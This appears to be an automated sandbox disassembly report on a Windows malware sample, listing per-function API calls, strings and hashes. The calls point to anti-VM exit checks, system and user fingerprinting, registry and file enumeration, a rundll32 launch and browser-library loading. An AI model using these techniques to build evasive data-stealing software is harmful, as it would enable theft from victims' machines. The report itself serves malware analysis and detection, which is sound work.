Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,00CE7350,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
Opcode ID: e7f94524d5209e66e64a18c5d2b76bc3aaa2351cf729918dd826a05dbbf6facf
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: e7f94524d5209e66e64a18c5d2b76bc3aaa2351cf729918dd826a05dbbf6facf
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CE2B68), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CE29E8), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CE2970), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CE2A48), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CE2910), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CC5F80), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CC43D8), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CC4258), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CE2988), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CE2AF0), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CE2AD8), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CE2B38), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CC4338), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,00CE2AA8), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,00CE2D58,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CC5FA0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,00CC5FA0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1175201934-0
Opcode ID: e0a44d225403f35228e18e24baf2bf2d903254b04228339fb3fb740daa236744
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: e0a44d225403f35228e18e24baf2bf2d903254b04228339fb3fb740daa236744
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,00CE7350,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

ShellExecuteEx.SHELL32(0000003C), ref: 00411307

Strings

"" , xrefs: 004111DC
<, xrefs: 004112AC
C:\Windows\system32\rundll32.dll, xrefs: 004110BF
.dll, xrefs: 00411054

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: dfe7e987e1edf23e951a13d30220350f22ef234cf6179a15d04d8d2da40fa005
Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
Opcode Fuzzy Hash: dfe7e987e1edf23e951a13d30220350f22ef234cf6179a15d04d8d2da40fa005
Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00CE6168), ref: 0041244B

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412471
lstrcat.KERNEL32(?,?), ref: 00412490
lstrcat.KERNEL32(?,?), ref: 004124A4
lstrcat.KERNEL32(?,00CC8F48), ref: 004124B7
lstrcat.KERNEL32(?,?), ref: 004124CB
lstrcat.KERNEL32(?,00CE66E8), ref: 004124DF

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: b57b05ee8832f0626f08ce65bf2c4d65e49e614dff18b6bb9c95ebeb65966398
Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
Opcode Fuzzy Hash: b57b05ee8832f0626f08ce65bf2c4d65e49e614dff18b6bb9c95ebeb65966398
Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 004129BA
lstrcat.KERNEL32(?,0041D888), ref: 004129D7
lstrcat.KERNEL32(?,00CE2FE8), ref: 004129EB
lstrcat.KERNEL32(?,0041D88C), ref: 004129FD

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

L0A, xrefs: 00412A22, 00412A51, 00412A73, 00412A25, 00412A54

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: L0A
API String ID: 2667927680-1482484291
Opcode ID: ca75f08c146bcee85987ae908b3e253e7d46972da6ab5dad8327017ffa89ad2c
Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
Opcode Fuzzy Hash: ca75f08c146bcee85987ae908b3e253e7d46972da6ab5dad8327017ffa89ad2c
Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,00CC9278,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,00CE6C08,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,00CC95F8,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,00CE6528,00000000,00000000,000000FF,000000FF), ref: 0041435C
RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00CE2C98,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(00CE6D48,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,00CC5FA0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(00CE2C98,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 1589abf169482fefd94c6efe8e32b63453fb96e864d309e200a11937223ec9ce
Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: 1589abf169482fefd94c6efe8e32b63453fb96e864d309e200a11937223ec9ce
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623
@:h@, xrefs: 00406670, 00406673
:h@, xrefs: 004065DD, 004065FD, 0040667F

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85

Uniqueness

Uniqueness Score: -1.00%

Function 658A3060 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 658A3095

Part of subcall function 658A35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6592F688,00001000), ref: 658A35D5
Part of subcall function 658A35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 658A35E0
